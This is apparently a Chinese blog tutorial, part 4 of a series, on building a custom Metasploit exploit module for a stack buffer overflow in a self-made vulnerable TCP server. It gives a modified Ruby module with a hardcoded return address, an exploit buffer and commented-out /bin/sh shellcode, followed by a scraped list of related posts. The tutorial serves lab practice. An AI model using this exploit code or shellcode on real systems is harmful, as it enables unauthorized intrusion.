有了漏洞我们就可以进行攻击了。首先我们需要了解metasploit的exploit模块,具体可以看

http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

metasploit本身功能非常强大,这里不多做介绍。

首先我们需要添加一个针对这个漏洞的exploit模块,

我们直接在样例上进行修改:

root@bt:~/.msf4/modules# mkdir exploits

root@bt:~/.msf4/modules# cd exploits

root@bt:~/.msf4/modules/exploits# mkdir linux

root@bt:~/.msf4/modules/exploits/linux# cp /pentest/exploits/framework/documentation/samples/modules/exploits/sample.rb  myvictim.rb

root@bt:~/.msf4/modules/exploits/linux# ls

myvictim.rb  myvictimserver.rb  proftp_sreplace.rb

然后查看myvictim.rb

##

# $Id: sample.rb 9212 2010-05-03 17:13:09Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

module Msf

###

#

# This exploit sample shows how an exploit module could be written to exploit

# a bug in an arbitrary TCP server.

#

###

class Exploits::Sample < Msf::Exploit::Remote

        #

        # This exploit affects TCP servers, so we use the TCP client mixin.

        #

        include Exploit::Remote::Tcp

        def initialize(info = {})

                super(update_info(info,

                        'Name'           => 'Sample exploit',

                        'Description'    => %q{

                                        This exploit module illustrates how a vu

lnerability could be exploited

                                in an TCP server that has a parsing bug.

                        },

                        'Author'         => 'skape',

                        'Version'        => '$Revision: 9212 $',

                        'References'     =>

                                [

                                ],

                        'Payload'        =>

                                {

                                        'Space'    => 1000,

                                        'BadChars' => "\x00",

                                },

                        'Targets'        =>

                                [

                                        # Target 0: Windows All

                                        [

                                                'Windows Universal',

                                                {

                                                        'Platform' => 'win',

                                                        'Ret'      => 0x41424344

                                                }

                                        ],

                                ],

                        'DefaultTarget' => 0))

        end

        #

        # The sample exploit just indicates that the remote host is always

        # vulnerable.

        #

        def check

                return Exploit::CheckCode::Vulnerable

        end

        #

        # The exploit method connects to the remote service and sends 1024 A's

        # followed by the fake return address and then the payload.

        #

        def exploit

                connect

                print_status("Sending #{payload.encoded.length} byte payload..."

)

                # Build the buffer for transmission

                buf  = "A" * 1024

                buf += [ target.ret ].pack('V')

                buf += payload.encoded

                # Send it off

                sock.put(buf)

                sock.get

                handler

        end

end

end

然后我们需要把他添加进metasploit,运行reload_all

=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 719 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 1208 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

msf > reload_all

msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictimserver
use exploit/linux/mysql/mysql_yassl_hello
msf > use exploit/linux/my

这里并没有列出来我们刚刚添加的模块,说明模块有问题,必须修改,修改如下:

##

# $Id: myvictimserver.rb 9212 2014-11-03 17:13:09Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

###

#

# This exploit sample shows how an exploit module could be written to exploit

# a bug in an arbitrary TCP server.

#

###

class Metasploit3 < Msf::Exploit::Remote

    Rank = GreatRanking

    #

    # This exploit affects TCP servers, so we use the TCP client mixin.

    #

    include Exploit::Remote::Tcp

    def initialize(info = {})

        super(update_info(info,

            'Name'           => 'MyVictimSever',

            'Description'    => %q{

                    This exploit module illustrates how a vulnerability could be exploited

                in an TCP server that has a stackoverflow bug.

            },

            'Author'         => 'bai',

            'Version'        => '$Revision: 9212 $',

            'References'     =>

                [

                ],

            'Payload'        =>

                {

                    'Space'    => 116, #

                    'BadChars' => "\x00",

                },

            'Targets'        =>

                [

                    # Target 0: Windows All

                    [

                        'MyVictimSever run on linux',

                        {

                            'Platform' => 'Linux',

                            'Ret'      =>  0xbffff4a4

                        }

                    ],

                ],

            'DefaultTarget' => 0))

    end

    #

    # The sample exploit just indicates that the remote host is always

    # vulnerable.

    #

    def check

        return Exploit::CheckCode::Vulnerable

    end

    #

    # The exploit method connects to the remote service and sends 1024 A's

    # followed by the fake return address and then the payload.

    #

    def exploit

        connect

        print_status("Sending #{payload.encoded.length} byte payload...")

        # Build the buffer for transmission

        buf="";

        #buf  = "\x90" * 15

        #buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

        #buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

        #buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh";

        buf+="\xa4\xf4\xff\xbf"

        buf += payload.encoded

        buf += [].fill( target.ret,0,100).pack('V*')

        # Send it off

        sock.put(buf)

        sock.get

        handler

    end

end

这时候,我们就可以找到这个模块了。

msf > use exploit/linux/my

use exploit/linux/mysql/mysql_yassl_getname  use exploit/linux/myvictim

use exploit/linux/mysql/mysql_yassl_hello    use exploit/linux/myvictimserver

msf > use exploit/linux/my

使用metasploit进行栈溢出攻击-4的更多相关文章

  1. 使用metasploit进行栈溢出攻击-1

    攻击是在bt5下面进行,目标程序是在ubuntu虚拟机上运行. 首先,需要搞明白什么是栈溢出攻击,详细内容请阅读 http://blog.csdn.net/cnctloveyu/article/det ...

  2. 使用metasploit进行栈溢出攻击-2

    基本的栈溢出搞明白了,真实攻击中一个很重要的问题是shellcode生成. 利用Metasploit提供的工具,可以方便的生成shellcode,然后可以使用第一篇中的代码进行验证. 先说一下如何生成 ...

  3. 使用metasploit进行栈溢出攻击-3

    有了shellcode,就可以进行攻击了,但是要有漏洞才行,真实世界中的漏洞很复杂,并且很难发现,因此我专门做一个漏洞来进行攻击. 具体来说就是做一个简单的tcp server,里面包含明显的栈溢出漏 ...

  4. 使用metasploit进行栈溢出攻击-5

    我们先尝试使用这个脚本进行攻击: msf > use exploit/linux/myvictim msf exploit(myvictim) > set payload linux/x8 ...

  5. [转]现代Linux系统上的栈溢出攻击

    1. 基本内容 这个教程试着向读者展示最基本的栈溢出攻击和现代Linux发行版中针对这种攻击的防御机制.为此我选择了最新版本的Ubuntu系统(12.10),因为它默认集成了几个安全防御机制,而且它也 ...

  6. Linux下基本栈溢出攻击【转】

    转自:http://blog.csdn.net/wangxiaolong_china/article/details/6844415 版权声明:本文为博主原创文章,未经博主允许不得转载. 目录(?)[ ...

  7. [翻译]现代Linux系统上的栈溢出攻击【转】

    转自:http://www.codeweblog.com/%E7%BF%BB%E8%AF%91-%E7%8E%B0%E4%BB%A3linux%E7%B3%BB%E7%BB%9F%E4%B8%8A%E ...

  8. [转]初探Metasploit的自动攻击

    1. 科普Metasploit   以前只是个Back Track操作系统(简称:BT) 下的攻击框架,自成继承了后攻击渗透模块,隐隐有成为攻击平台的趋势. 我们都戏称它为美少妇,很简单,msf. 它 ...

  9. 实验三 kali下metasploit的漏洞攻击实践

    一.实验内容 1.使用kali进行靶机的漏洞扫描,利用metasploit选择其中的一个漏洞进行攻击,并获取权限. 2.分析攻击的原理以及获取了什么样的权限. 二.实验要求 1.熟悉kali原理和使用 ...

随机推荐

  1. WPF中DataGrid控件的过滤(Filter)性能分析及优化

    DataGrid控件是一个列表控件, 可以进行过滤,排序等.本文主要针对DataGrid的过滤功能进行分析, 并提供优化方案. 1)DataGrid的过滤过程:      用户输入过滤条件       ...

  2. Azure VM开启资源监控

    目前China的Azure VM资源监控默认是不打开的.本文将介绍如何开启VM的监控功能. 一 Azure VM 打开Azure的Portal页面https://portal.azure.cn,登录后 ...

  3. Linux网络工具lsof和netstat

    lsof全名为list opened files,即列举系统中已经被打开的文件,基本使用如下: (1) 查看/etc/passwd使用情况 lsof /etc/password (2) 查看监听的so ...

  4. Network(lca暴力)

    Network Time Limit : 2000/1000ms (Java/Other)   Memory Limit : 65536/65536K (Java/Other) Total Submi ...

  5. md5加密(2)

    package test1; import java.security.MessageDigest; public class MD5Test { //十六进制下数字到字符的映射数组 private ...

  6. a(+;-;*;/)b-----demo----bai

    页面: <%@ page language="java" import="java.util.*" pageEncoding="UTF-8&qu ...

  7. 执行: python manage.py makemigrations报AttributeError: 'str' object has no attribute 'decode'

    找到错误代码(line146):query = query.encode(errors='replace') 解决方法:把decode改为encode即可.

  8. 2015.1.4 判断鼠标点击DataGridView的第几行还是空白处

    public int GetRowIndexAt(int mouseLocation_Y) { if (dvaw.FirstDisplayedScrollingRowIndex < 0) { r ...

  9. SetConsoleCtrlHandler演示

    #include "stdafx.h"#include <Windows.h> static BOOL WINAPI Handler(DWORD cntrlEvent) ...

  10. paramiko远程执行命令成功